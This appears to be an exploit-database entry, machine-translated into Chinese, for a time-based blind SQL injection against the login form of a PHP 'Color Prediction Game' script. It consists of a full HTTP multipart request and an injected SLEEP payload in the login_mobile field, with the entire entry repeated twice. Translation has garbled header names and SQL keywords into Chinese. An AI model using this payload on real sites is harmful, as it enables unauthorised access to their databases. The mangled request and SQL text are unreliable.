#利用标题:颜色预测游戏v1.0 -SQL注入
#日期: 2023-08-12
#利用作者: ahmetümitBayram
#vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
#在: Kali Linux MacOS上测试
#CVE: N/A。
### 要求###
post /loginnow.php http /1.1
HOST: LOCALHOST
cookie: phpsessid=250594265b833a4d3a7adf6e1c136fe2
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:109.0)
壁虎/20100101 Firefox/116.0
ACCEPT: /
Accept-Language: TR-TR,TR; Q=0.8,EN-US; Q=0.5,en; q=0.3
Accept-incoding: Gzip,放气
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=--------------------------------- 395879129218961020344050490865
内容长度: 434
Origin: http://localhost
Referer: http://localhost/login.php
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
TE:拖车
连接:关闭
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_mobile'
433434343433
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_password'
123456
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='动作'
登录
--------------------------------------- 395879129218961020344050490865-
###参数有效载荷###
参数: Multipart Login_mobile((自定义)帖子)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: --------------------------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_mobile'
4334343433'和(Select 4472从(Select(Sleep(5)))UADA)和'pdlw'='PDLW
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_password'
123456
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='动作'
登录
--------------------------------------- 395879129218961020344050490865-
#日期: 2023-08-12
#利用作者: ahmetümitBayram
#vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
#在: Kali Linux MacOS上测试
#CVE: N/A。
### 要求###
post /loginnow.php http /1.1
HOST: LOCALHOST
cookie: phpsessid=250594265b833a4d3a7adf6e1c136fe2
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:109.0)
壁虎/20100101 Firefox/116.0
ACCEPT: /
Accept-Language: TR-TR,TR; Q=0.8,EN-US; Q=0.5,en; q=0.3
Accept-incoding: Gzip,放气
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=--------------------------------- 395879129218961020344050490865
内容长度: 434
Origin: http://localhost
Referer: http://localhost/login.php
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
TE:拖车
连接:关闭
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_mobile'
433434343433
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_password'
123456
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='动作'
登录
--------------------------------------- 395879129218961020344050490865-
###参数有效载荷###
参数: Multipart Login_mobile((自定义)帖子)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: --------------------------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_mobile'
4334343433'和(Select 4472从(Select(Sleep(5)))UADA)和'pdlw'='PDLW
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='login_password'
123456
--------------------------------------- 395879129218961020344050490865
content-disposition: form-data;名称='动作'
登录
--------------------------------------- 395879129218961020344050490865-
